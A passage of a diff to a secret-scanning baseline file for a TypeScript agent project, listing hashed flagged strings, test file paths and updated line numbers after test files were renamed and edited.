"3148ad4aafbeefee82355e1cde29b6d77ba4cf21", + "is_verified": false, + "line_number": 248 + } + ], + "src/agents/models-config.providers.qianfan.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.qianfan.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 12 + "line_number": 11 } ], - "src/agents/models-config.skips-writing-models-json-no-env-token.e2e.test.ts": [ + "src/agents/models-config.providers.volcengine-byteplus.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/models-config.skips-writing-models-json-no-env-token.e2e.test.ts", + "filename": "src/agents/models-config.providers.volcengine-byteplus.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 13 + } + ], + "src/agents/models-config.skips-writing-models-json-no-env-token.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.skips-writing-models-json-no-env-token.test.ts", "hashed_secret": "4c7bac93427c83bcc3beeceebfa54f16f801b78f", "is_verified": false, "line_number": 100 }, { "type": "Secret Keyword", - "filename": "src/agents/models-config.skips-writing-models-json-no-env-token.e2e.test.ts", + "filename": "src/agents/models-config.skips-writing-models-json-no-env-token.test.ts", "hashed_secret": "4f2b3ddc953da005a97d825652080fe6eff21520", "is_verified": false, "line_number": 113 @@ -11589,7 +12265,39 @@ "filename": "src/agents/openai-responses.reasoning-replay.test.ts", "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", "is_verified": false, - "line_number": 55 + "line_number": 92 + } + ], + "src/agents/owner-display.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/owner-display.test.ts", + "hashed_secret": "e9dc4e431a9043d0d7d2750af1189e77e2834877", + "is_verified": false, + "line_number": 16 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/owner-display.test.ts", + "hashed_secret": "d9d2f263c630f79c8eb176dbccfef7c3ade3ddcc", + "is_verified": false, + "line_number": 70 + } + ], + "src/agents/pi-embedded-runner-extraparams.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/pi-embedded-runner-extraparams.test.ts", + "hashed_secret": "4604122d2d19b953716499c7fade74e3db0ad17f", + "is_verified": false, + "line_number": 1075 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/pi-embedded-runner-extraparams.test.ts", + "hashed_secret": "81181bf462a0965325a629cff91f511e285d59d4", + "is_verified": false, + "line_number": 1133 } ], "src/agents/pi-embedded-runner.e2e.test.ts": [ @@ -11598,14 +12306,16 @@ "filename": "src/agents/pi-embedded-runner.e2e.test.ts", "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 127 - }, + "line_number": 122 + } + ], + "src/agents/pi-embedded-runner.run-embedded-pi-agent.auth-profile-rotation.e2e.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/pi-embedded-runner.e2e.test.ts", - "hashed_secret": "fcdd655b11f33ba4327695084a347b2ba192976c", + "filename": "src/agents/pi-embedded-runner.run-embedded-pi-agent.auth-profile-rotation.e2e.test.ts", + "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 238 + "line_number": 159 } ], "src/agents/pi-embedded-runner/model.ts": [ @@ -11614,7 +12324,7 @@ "filename": "src/agents/pi-embedded-runner/model.ts", "hashed_secret": "e774aaeac31c6272107ba89080295e277050fa7c", "is_verified": false, - "line_number": 118 + "line_number": 232 } ], "src/agents/pi-embedded-runner/run.overflow-compaction.mocks.shared.ts": [ @@ -11623,16 +12333,55 @@ "filename": "src/agents/pi-embedded-runner/run.overflow-compaction.mocks.shared.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 86 + "line_number": 114 } ], - "src/agents/pi-tools.safe-bins.e2e.test.ts": [ + "src/agents/pi-extensions/compaction-safeguard.test.ts": [ + { + "type": "Hex High Entropy String", + "filename": "src/agents/pi-extensions/compaction-safeguard.test.ts", + "hashed_secret": "0091061a3babbe6f11d48aa0142e22341b3ea446", + "is_verified": false, + "line_number": 665 + }, + { + "type": "Hex High Entropy String", + "filename": "src/agents/pi-extensions/compaction-safeguard.test.ts", + "hashed_secret": "ef678205593788329ff416ce5c65fa04f33a05bd", + "is_verified": false, + "line_number": 811 + }, { "type": "Secret Keyword", - "filename": "src/agents/pi-tools.safe-bins.e2e.test.ts", - "hashed_secret": "3ea88a727641fd5571b5e126ce87032377be1e7f", + "filename": "src/agents/pi-extensions/compaction-safeguard.test.ts", + "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 126 + "line_number": 1490 + } + ], + "src/agents/sandbox/browser.novnc-url.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/sandbox/browser.novnc-url.test.ts", + "hashed_secret": "16c002d49d19805aa1bfba58e9c90b5476054b07", + "is_verified": false, + "line_number": 18 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/sandbox/browser.novnc-url.test.ts", + "hashed_secret": "7ce0359f12857f2a90c7de465f40a95f01cb5da9", + "is_verified": false, + "line_number": 27 + } + ], + "src/agents/sandbox/sanitize-env-vars.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/sandbox/sanitize-env-vars.test.ts", + "hashed_secret": "c747c6b0a7bb9c6337b81875af1a9f9568c740ad", + "is_verified": false, + "line_number": 8 } ], "src/agents/sanitize-for-prompt.test.ts": [ @@ -11644,65 +12393,141 @@ "line_number": 28 } ], - "src/agents/skills.build-workspace-skills-prompt.prefers-workspace-skills-managed-skills.e2e.test.ts": [ + "src/agents/session-transcript-repair.attachments.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/skills.build-workspace-skills-prompt.prefers-workspace-skills-managed-skills.e2e.test.ts", - "hashed_secret": "7a85f4764bbd6daf1c3545efbbf0f279a6dc0beb", + "filename": "src/agents/session-transcript-repair.attachments.test.ts", + "hashed_secret": "d25df4833026f016b73dcfa20f33bf753daf7593", "is_verified": false, - "line_number": 103 - } - ], - "src/agents/skills.build-workspace-skills-prompt.syncs-merged-skills-into-target-workspace.e2e.test.ts": [ - { - "type": "Secret Keyword", - "filename": "src/agents/skills.build-workspace-skills-prompt.syncs-merged-skills-into-target-workspace.e2e.test.ts", - "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", - "is_verified": false, - "line_number": 147 - } - ], - "src/agents/skills.e2e.test.ts": [ - { - "type": "Secret Keyword", - "filename": "src/agents/skills.e2e.test.ts", - "hashed_secret": "5df3a673d724e8a1eb673a8baf623e183940804d", - "is_verified": false, - "line_number": 250 + "line_number": 32 }, { "type": "Secret Keyword", - "filename": "src/agents/skills.e2e.test.ts", + "filename": "src/agents/session-transcript-repair.attachments.test.ts", + "hashed_secret": "30b1e9e71b6de9c2d579657e551b95f7eaae406d", + "is_verified": false, + "line_number": 47 + } + ], + "src/agents/skills-install.download.test.ts": [ + { + "type": "Base64 High Entropy String", + "filename": "src/agents/skills-install.download.test.ts", + "hashed_secret": "459acf71d00174faf13cfeee88513702c82d3cb3", + "is_verified": false, + "line_number": 51 + } + ], + "src/agents/skills.build-workspace-skills-prompt.prefers-workspace-skills-managed-skills.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/skills.build-workspace-skills-prompt.prefers-workspace-skills-managed-skills.test.ts", + "hashed_secret": "7a85f4764bbd6daf1c3545efbbf0f279a6dc0beb", + "is_verified": false, + "line_number": 118 + } + ], + "src/agents/skills.build-workspace-skills-prompt.syncs-merged-skills-into-target-workspace.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/skills.build-workspace-skills-prompt.syncs-merged-skills-into-target-workspace.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 181 + } + ], + "src/agents/skills.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/skills.test.ts", + "hashed_secret": "5df3a673d724e8a1eb673a8baf623e183940804d", + "is_verified": false, + "line_number": 255 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/skills.test.ts", "hashed_secret": "8921daaa546693e52bc1f9c40bdcf15e816e0448", "is_verified": false, - "line_number": 277 - } - ], - "src/agents/tools/web-fetch.firecrawl-api-key-normalization.e2e.test.ts": [ + "line_number": 313 + }, { "type": "Secret Keyword", - "filename": "src/agents/tools/web-fetch.firecrawl-api-key-normalization.e2e.test.ts", - "hashed_secret": "9da08ab1e27fe0ae2ba6101aea30edcec02d21a4", + "filename": "src/agents/skills.test.ts", + "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 45 - } - ], - "src/agents/tools/web-fetch.ssrf.e2e.test.ts": [ + "line_number": 352 + }, { "type": "Secret Keyword", - "filename": "src/agents/tools/web-fetch.ssrf.e2e.test.ts", + "filename": "src/agents/skills.test.ts", + "hashed_secret": "895900e6b5d30fa84fbff6e4e4c10eb5a63c5f8f", + "is_verified": false, + "line_number": 427 + } + ], + "src/agents/system-prompt.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/system-prompt.test.ts", + "hashed_secret": "0a111adae31992afa2873148fdfcaf39e70ec7d8", + "is_verified": false, + "line_number": 76 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/system-prompt.test.ts", + "hashed_secret": "2b3140fdd098f7cb2af72632ac2c0df772b8e90a", + "is_verified": false, + "line_number": 83 + } + ], + "src/agents/tools/pdf-tool.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/tools/pdf-tool.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 74 + } + ], + "src/agents/tools/web-fetch.ssrf.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-fetch.ssrf.test.ts", "hashed_secret": "5ce8e9d54c77266fff990194d2219a708c59b76c", "is_verified": false, - "line_number": 73 + "line_number": 84 } ], - "src/agents/tools/web-search.e2e.test.ts": [ + "src/agents/tools/web-search.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/tools/web-search.e2e.test.ts", + "filename": "src/agents/tools/web-search.test.ts", "hashed_secret": "c8d313eac6d38274ccfc0fa7935c68bd61d5bc2f", "is_verified": false, - "line_number": 129 + "line_number": 105 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-search.test.ts", + "hashed_secret": "1561970702b4bf5bb10266b292e545ec14fc602e", + "is_verified": false, + "line_number": 224 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-search.test.ts", + "hashed_secret": "c930e4d402a279c3feea98578f716d5665c8cc5d", + "is_verified": false, + "line_number": 228 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-search.test.ts", + "hashed_secret": "5c1a5088b7790a73e236f21d65a5e4384a742af0", + "is_verified": false, + "line_number": 231 } ], "src/agents/tools/web-search.ts": [ @@ -11711,85 +12536,85 @@ "filename": "src/agents/tools/web-search.ts", "hashed_secret": "dfba7aade0868074c2861c98e2a9a92f3178a51b", "is_verified": false, - "line_number": 97 - }, - { - "type": "Secret Keyword", - "filename": "src/agents/tools/web-search.ts", - "hashed_secret": "71f8e7976e4cbc4561c9d62fb283e7f788202acb", - "is_verified": false, - "line_number": 285 - }, - { - "type": "Secret Keyword", - "filename": "src/agents/tools/web-search.ts", - "hashed_secret": "c4865ff9250aca23b0d98eb079dad70ebec1cced", - "is_verified": false, - "line_number": 295 - }, - { - "type": "Secret Keyword", - "filename": "src/agents/tools/web-search.ts", - "hashed_secret": "527ee41f36386e85fa932ef09471ca017f3c95c8", - "is_verified": false, - "line_number": 298 + "line_number": 254 } ], - "src/agents/tools/web-tools.enabled-defaults.e2e.test.ts": [ + "src/agents/tools/web-tools.enabled-defaults.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/tools/web-tools.enabled-defaults.e2e.test.ts", - "hashed_secret": "47b249a75ca78fdb578d0f28c33685e27ea82684", + "filename": "src/agents/tools/web-tools.enabled-defaults.test.ts", + "hashed_secret": "f6558c30641dd2d38c6e8e7389dd724327c9627e", "is_verified": false, - "line_number": 181 + "line_number": 53 }, { "type": "Secret Keyword", - "filename": "src/agents/tools/web-tools.enabled-defaults.e2e.test.ts", - "hashed_secret": "d0ffd81d6d7ad1bc3c365660fe8882480c9a986e", + "filename": "src/agents/tools/web-tools.enabled-defaults.test.ts", + "hashed_secret": "59fa0cc80b21eb4ea49590dc887b95f5ae7e0bf5", "is_verified": false, - "line_number": 187 - } - ], - "src/agents/tools/web-tools.fetch.e2e.test.ts": [ + "line_number": 55 + }, { "type": "Secret Keyword", - "filename": "src/agents/tools/web-tools.fetch.e2e.test.ts", + "filename": "src/agents/tools/web-tools.enabled-defaults.test.ts", + "hashed_secret": "354a920b3d519d11b737695308dab1bfcf77dbb3", + "is_verified": false, + "line_number": 57 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-tools.enabled-defaults.test.ts", + "hashed_secret": "7ec282d2630c12bf9241ef44db50f1f780cdaa79", + "is_verified": false, + "line_number": 59 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-tools.enabled-defaults.test.ts", + "hashed_secret": "8ba65d9239fd59ffc16e202cb480d15e35bce964", + "is_verified": false, + "line_number": 60 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-tools.enabled-defaults.test.ts", + "hashed_secret": "fb724421f6f4a53c0a73101ea88e4090cabb7b1a", + "is_verified": false, + "line_number": 461 + } + ], + "src/agents/tools/web-tools.fetch.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/tools/web-tools.fetch.test.ts", "hashed_secret": "5ce8e9d54c77266fff990194d2219a708c59b76c", "is_verified": false, - "line_number": 246 + "line_number": 133 } ], - "src/auto-reply/reply.directive.directive-behavior.prefers-alias-matches-fuzzy-selection-is-ambiguous.e2e.test.ts": [ + "src/auto-reply/reply.directive.directive-behavior.prefers-alias-matches-fuzzy-selection-is-ambiguous.test.ts": [ { "type": "Secret Keyword", - "filename": "src/auto-reply/reply.directive.directive-behavior.prefers-alias-matches-fuzzy-selection-is-ambiguous.e2e.test.ts", + "filename": "src/auto-reply/reply.directive.directive-behavior.prefers-alias-matches-fuzzy-selection-is-ambiguous.test.ts", "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 56 + "line_number": 60 }, { "type": "Secret Keyword", - "filename": "src/auto-reply/reply.directive.directive-behavior.prefers-alias-matches-fuzzy-selection-is-ambiguous.e2e.test.ts", + "filename": "src/auto-reply/reply.directive.directive-behavior.prefers-alias-matches-fuzzy-selection-is-ambiguous.test.ts", "hashed_secret": "16c249e04e2be318050cb883c40137361c0c7209", "is_verified": false, - "line_number": 62 + "line_number": 142 } ], - "src/auto-reply/reply.directive.directive-behavior.supports-fuzzy-model-matches-model-directive.e2e.test.ts": [ + "src/auto-reply/reply.triggers.trigger-handling.filters-usage-summary-current-model-provider.cases.ts": [ { - "type": "Secret Keyword", - "filename": "src/auto-reply/reply.directive.directive-behavior.supports-fuzzy-model-matches-model-directive.e2e.test.ts", - "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", + "type": "Hex High Entropy String", + "filename": "src/auto-reply/reply.triggers.trigger-handling.filters-usage-summary-current-model-provider.cases.ts", + "hashed_secret": "ff998abc1ce6d8f01a675fa197368e44c8916e9c", "is_verified": false, - "line_number": 42 - }, - { - "type": "Secret Keyword", - "filename": "src/auto-reply/reply.directive.directive-behavior.supports-fuzzy-model-matches-model-directive.e2e.test.ts", - "hashed_secret": "16c249e04e2be318050cb883c40137361c0c7209", - "is_verified": false, - "line_number": 149 + "line_number": 216 } ], "src/auto-reply/status.test.ts": [ @@ -11807,7 +12632,14 @@ "filename": "src/browser/bridge-server.auth.test.ts", "hashed_secret": "6af3c121ed4a752936c297cddfb7b00394eabf10", "is_verified": false, - "line_number": 66 + "line_number": 72 + }, + { + "type": "Secret Keyword", + "filename": "src/browser/bridge-server.auth.test.ts", + "hashed_secret": "26aaf463d1d85670b71c6a84a2f644ad5995efc8", + "is_verified": false, + "line_number": 93 } ], "src/browser/browser-utils.test.ts": [ @@ -11816,14 +12648,14 @@ "filename": "src/browser/browser-utils.test.ts", "hashed_secret": "4e126c049580d66ca1549fa534d95a7263f27f46", "is_verified": false, - "line_number": 38 + "line_number": 43 }, { "type": "Basic Auth Credentials", "filename": "src/browser/browser-utils.test.ts", "hashed_secret": "9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684", "is_verified": false, - "line_number": 159 + "line_number": 164 } ], "src/browser/cdp.test.ts": [ @@ -11832,7 +12664,23 @@ "filename": "src/browser/cdp.test.ts", "hashed_secret": "9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684", "is_verified": false, - "line_number": 186 + "line_number": 243 + } + ], + "src/channels/account-snapshot-fields.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/channels/account-snapshot-fields.test.ts", + "hashed_secret": "dfba7aade0868074c2861c98e2a9a92f3178a51b", + "is_verified": false, + "line_number": 10 + }, + { + "type": "Secret Keyword", + "filename": "src/channels/account-snapshot-fields.test.ts", + "hashed_secret": "071d3673192b4b44a84aa73ac9d00c155821303b", + "is_verified": false, + "line_number": 11 } ], "src/channels/plugins/plugins-channel.test.ts": [ @@ -11841,16 +12689,98 @@ "filename": "src/channels/plugins/plugins-channel.test.ts", "hashed_secret": "99c962e8c62296bdc9a17f5caf91ce9bb4c7e0e6", "is_verified": false, - "line_number": 46 + "line_number": 64 } ], - "src/cli/program.smoke.e2e.test.ts": [ + "src/cli/acp-cli.option-collisions.test.ts": [ { "type": "Secret Keyword", - "filename": "src/cli/program.smoke.e2e.test.ts", - "hashed_secret": "8689a958b58e4a6f7da6211e666da8e17651697c", + "filename": "src/cli/acp-cli.option-collisions.test.ts", + "hashed_secret": "e5d0d3f3697f96d69545f36ab2eaf1f9d4e2a8f8", "is_verified": false, - "line_number": 215 + "line_number": 94 + }, + { + "type": "Secret Keyword", + "filename": "src/cli/acp-cli.option-collisions.test.ts", + "hashed_secret": "8eac0f7ffe62469bf88ebdb208115f1ce3567d07", + "is_verified": false, + "line_number": 106 + } + ], + "src/cli/command-secret-gateway.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/cli/command-secret-gateway.test.ts", + "hashed_secret": "68c46e84d76d2e7e686e5158bf598909abd4e45b", + "is_verified": false, + "line_number": 16 + }, + { + "type": "Secret Keyword", + "filename": "src/cli/command-secret-gateway.test.ts", + "hashed_secret": "3a20a67d6535d75cf0852a72a37e9c5a8fdb9976", + "is_verified": false, + "line_number": 120 + } + ], + "src/cli/config-cli.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/cli/config-cli.test.ts", + "hashed_secret": "e774aaeac31c6272107ba89080295e277050fa7c", + "is_verified": false, + "line_number": 200 + } + ], + "src/cli/daemon-cli/register-service-commands.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/cli/daemon-cli/register-service-commands.test.ts", + "hashed_secret": "d717176567cedb0012b6b5f4653f688bbb9ccb8b", + "is_verified": false, + "line_number": 67 + } + ], + "src/cli/daemon-cli/status.gather.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/cli/daemon-cli/status.gather.test.ts", + "hashed_secret": "c09520299bf32111c9f2ebafaf5a9981ec51a91d", + "is_verified": false, + "line_number": 208 + } + ], + "src/cli/program/register.onboard.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/cli/program/register.onboard.test.ts", + "hashed_secret": "5da1c2e689ee66cf379bc74d3eafd0460db70ca0", + "is_verified": false, + "line_number": 126 + } + ], + "src/cli/qr-cli.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/cli/qr-cli.test.ts", + "hashed_secret": "8fc5be300f480d027174b514b563e77548b636f2", + "is_verified": false, + "line_number": 230 + }, + { + "type": "Secret Keyword", + "filename": "src/cli/qr-cli.test.ts", + "hashed_secret": "f1355ae408e2068355dad8f3a503c2eaedefc0c6", + "is_verified": false, + "line_number": 248 + }, + { + "type": "Secret Keyword", + "filename": "src/cli/qr-cli.test.ts", + "hashed_secret": "4316c1b21634c0e3f4d53bfb3ca2f48dde69bc4e", + "is_verified": false, + "line_number": 285 } ], "src/cli/update-cli.test.ts": [ @@ -11859,51 +12789,64 @@ "filename": "src/cli/update-cli.test.ts", "hashed_secret": "e4f91dd323bac5bfc4f60a6e433787671dc2421d", "is_verified": false, - "line_number": 239 + "line_number": 277 } ], - "src/commands/auth-choice.e2e.test.ts": [ + "src/commands/auth-choice.apply-helpers.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/auth-choice.e2e.test.ts", - "hashed_secret": "2480500ff391183070fe22ba8665a8be19350833", + "filename": "src/commands/auth-choice.apply-helpers.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", "is_verified": false, - "line_number": 454 + "line_number": 105 }, { "type": "Secret Keyword", - "filename": "src/commands/auth-choice.e2e.test.ts", - "hashed_secret": "844ae5308654406d80db6f2b3d0beb07d616f9e1", + "filename": "src/commands/auth-choice.apply-helpers.test.ts", + "hashed_secret": "bea2f7b64fab8d1d414d0449530b1e088d36d5b1", "is_verified": false, - "line_number": 487 + "line_number": 111 }, { "type": "Secret Keyword", - "filename": "src/commands/auth-choice.e2e.test.ts", - "hashed_secret": "77e991e9f56e6fa4ed1a908208048421f1214c07", + "filename": "src/commands/auth-choice.apply-helpers.test.ts", + "hashed_secret": "d23a3625f8598b9cd747e74c1f1676f5ba7be530", "is_verified": false, - "line_number": 549 + "line_number": 330 + } + ], + "src/commands/auth-choice.apply.minimax.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/auth-choice.apply.minimax.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", + "is_verified": false, + "line_number": 162 }, { "type": "Secret Keyword", - "filename": "src/commands/auth-choice.e2e.test.ts", - "hashed_secret": "266e955b27b5fc2c2f532e446f2e71c3667a4cd9", + "filename": "src/commands/auth-choice.apply.minimax.test.ts", + "hashed_secret": "c090713b544ae4cabb48f2153079955947c6e013", "is_verified": false, - "line_number": 584 - }, + "line_number": 175 + } + ], + "src/commands/auth-choice.apply.openai.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/auth-choice.e2e.test.ts", - "hashed_secret": "1b4d8423b11d32dd0c466428ac81de84a4a9442b", + "filename": "src/commands/auth-choice.apply.openai.test.ts", + "hashed_secret": "c5831e54ef6edcf968300daf4a9a84580bc2ed37", "is_verified": false, - "line_number": 726 - }, + "line_number": 31 + } + ], + "src/commands/auth-choice.apply.volcengine-byteplus.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/auth-choice.e2e.test.ts", - "hashed_secret": "c24e00b94c972ed497d5961212ac96f0dffb4f7a", + "filename": "src/commands/auth-choice.apply.volcengine-byteplus.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", "is_verified": false, - "line_number": 798 + "line_number": 55 } ], "src/commands/auth-choice.preferred-provider.ts": [ @@ -11915,84 +12858,182 @@ "line_number": 8 } ], - "src/commands/configure.gateway-auth.e2e.test.ts": [ + "src/commands/auth-choice.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/configure.gateway-auth.e2e.test.ts", - "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "filename": "src/commands/auth-choice.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", "is_verified": false, - "line_number": 21 + "line_number": 679 }, { "type": "Secret Keyword", - "filename": "src/commands/configure.gateway-auth.e2e.test.ts", - "hashed_secret": "d5d4cd07616a542891b7ec2d0257b3a24b69856e", + "filename": "src/commands/auth-choice.test.ts", + "hashed_secret": "c5831e54ef6edcf968300daf4a9a84580bc2ed37", "is_verified": false, - "line_number": 62 - } - ], - "src/commands/daemon-install-helpers.e2e.test.ts": [ + "line_number": 745 + }, { "type": "Secret Keyword", - "filename": "src/commands/daemon-install-helpers.e2e.test.ts", + "filename": "src/commands/auth-choice.test.ts", + "hashed_secret": "844ae5308654406d80db6f2b3d0beb07d616f9e1", + "is_verified": false, + "line_number": 955 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/auth-choice.test.ts", + "hashed_secret": "1c62e8a666fb3e1b8c9b0c1cab8e1d6bbb136580", + "is_verified": false, + "line_number": 1065 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/auth-choice.test.ts", + "hashed_secret": "1b4d8423b11d32dd0c466428ac81de84a4a9442b", + "is_verified": false, + "line_number": 1222 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/auth-choice.test.ts", + "hashed_secret": "c24e00b94c972ed497d5961212ac96f0dffb4f7a", + "is_verified": false, + "line_number": 1234 + } + ], + "src/commands/channels.config-only-status-output.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/channels.config-only-status-output.test.ts", + "hashed_secret": "dfba7aade0868074c2861c98e2a9a92f3178a51b", + "is_verified": false, + "line_number": 149 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/channels.config-only-status-output.test.ts", + "hashed_secret": "071d3673192b4b44a84aa73ac9d00c155821303b", + "is_verified": false, + "line_number": 150 + } + ], + "src/commands/configure.gateway-auth.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/configure.gateway-auth.test.ts", + "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "is_verified": false, + "line_number": 24 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/configure.gateway-auth.test.ts", + "hashed_secret": "d5d4cd07616a542891b7ec2d0257b3a24b69856e", + "is_verified": false, + "line_number": 65 + } + ], + "src/commands/daemon-install-helpers.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/daemon-install-helpers.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, "line_number": 128 } ], + "src/commands/doctor-gateway-auth-token.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/doctor-gateway-auth-token.test.ts", + "hashed_secret": "f1355ae408e2068355dad8f3a503c2eaedefc0c6", + "is_verified": false, + "line_number": 166 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/doctor-gateway-auth-token.test.ts", + "hashed_secret": "0b75f28abf6b39a10d1398ce5a95e93a5cebbbda", + "is_verified": false, + "line_number": 206 + } + ], "src/commands/doctor-memory-search.test.ts": [ { "type": "Secret Keyword", "filename": "src/commands/doctor-memory-search.test.ts", "hashed_secret": "2e07956ffc9bc4fd624064c40b7495c85d5f1467", "is_verified": false, - "line_number": 38 - } - ], - "src/commands/model-picker.e2e.test.ts": [ + "line_number": 43 + }, { "type": "Secret Keyword", - "filename": "src/commands/model-picker.e2e.test.ts", + "filename": "src/commands/doctor-memory-search.test.ts", + "hashed_secret": "e774aaeac31c6272107ba89080295e277050fa7c", + "is_verified": false, + "line_number": 278 + } + ], + "src/commands/doctor.warns-state-directory-is-missing.e2e.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/doctor.warns-state-directory-is-missing.e2e.test.ts", + "hashed_secret": "f3c7399f056377fc3dae16a9854fe636b720d3d0", + "is_verified": false, + "line_number": 98 + } + ], + "src/commands/gateway-install-token.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/gateway-install-token.test.ts", + "hashed_secret": "f3c7399f056377fc3dae16a9854fe636b720d3d0", + "is_verified": false, + "line_number": 143 + } + ], + "src/commands/gateway-status/helpers.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/gateway-status/helpers.test.ts", + "hashed_secret": "1e1ff291f3b48b7e5b54828396f264ba43379076", + "is_verified": false, + "line_number": 183 + } + ], + "src/commands/message.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/message.test.ts", + "hashed_secret": "3bb1ec510d35ab2af7d05d8bbd5f0820333f1a0d", + "is_verified": false, + "line_number": 194 + } + ], + "src/commands/model-picker.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/commands/model-picker.test.ts", "hashed_secret": "5b924ca5330ede58702a5b0e414207b90fb1aef3", "is_verified": false, - "line_number": 127 + "line_number": 105 } ], - "src/commands/models/list.status.e2e.test.ts": [ + "src/commands/onboard-auth.config-core.kilocode.test.ts": [ { - "type": "Base64 High Entropy String", - "filename": "src/commands/models/list.status.e2e.test.ts", - "hashed_secret": "d6ae2508a78a232d5378ef24b85ce40cbb4d7ff0", + "type": "Secret Keyword", + "filename": "src/commands/onboard-auth.config-core.kilocode.test.ts", + "hashed_secret": "01800a0712a2a1aa928b95c4745e9ee06673925b", "is_verified": false, - "line_number": 12 - }, - { - "type": "Base64 High Entropy String", - "filename": "src/commands/models/list.status.e2e.test.ts", - "hashed_secret": "2d8012102440ea97852b3152239218f00579bafa", - "is_verified": false, - "line_number": 19 - }, - { - "type": "Base64 High Entropy String", - "filename": "src/commands/models/list.status.e2e.test.ts", - "hashed_secret": "51848e2be4b461a549218d3167f19c01be6b98b8", - "is_verified": false, - "line_number": 51 + "line_number": 163 }, { "type": "Secret Keyword", - "filename": "src/commands/models/list.status.e2e.test.ts", - "hashed_secret": "51848e2be4b461a549218d3167f19c01be6b98b8", + "filename": "src/commands/onboard-auth.config-core.kilocode.test.ts", + "hashed_secret": "8d2ce71c6723bf46f6c166984b4ddb597f92322a", "is_verified": false, - "line_number": 51 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/models/list.status.e2e.test.ts", - "hashed_secret": "1c1e381bfb72d3b7bfca9437053d9875356680f0", - 